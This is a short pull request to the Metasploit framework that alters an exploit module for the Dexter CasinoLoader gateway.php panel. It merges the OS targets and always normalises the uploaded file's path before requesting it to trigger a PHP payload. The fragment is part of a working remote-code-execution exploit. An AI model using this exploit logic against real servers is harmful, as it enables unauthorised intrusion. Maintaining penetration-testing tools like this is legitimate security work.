### PR TITLE
Always replace \ with / for Dexter exploit

### DIFF
--- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb
+++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb
@@ -41,10 +41,10 @@ class Metasploit3 < Msf::Exploit::Remote
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          ['CasinoLoader gateway.php on Windows', {}],
-          ['CasinoLoader gateway.php on Linux',   {}]
+          ['CasinoLoader gateway.php', {}]
         ],
       'Privileged'     => false,
+      'DefaultTarget'  => 0,
       'DisclosureDate' => "Feb 08 2014"
     ))
 
@@ -157,9 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     if res and res.code == 200 and res.body =~ /a href="upload.php\?del=(.*)">/
       path = $1
-      if target.name =~ /Linux/
-        path = path.sub! "\\", "/"
-      end
+      path = path.sub! "\\", "/"
       target_path = normalize_uri(target_uri.path, path)
       print_status("#{peer} - Requesting: #{target_path}")
       send_request_raw({'uri' => normalize_uri(target_path)})


### PR DESCRIPTION
Fix for the following:
https://github.com/rapid7/metasploit-framework/commit/48199fec271006ed66c4de639cd39e41f05df511#commitcomment-5419010

Original PR is #2973
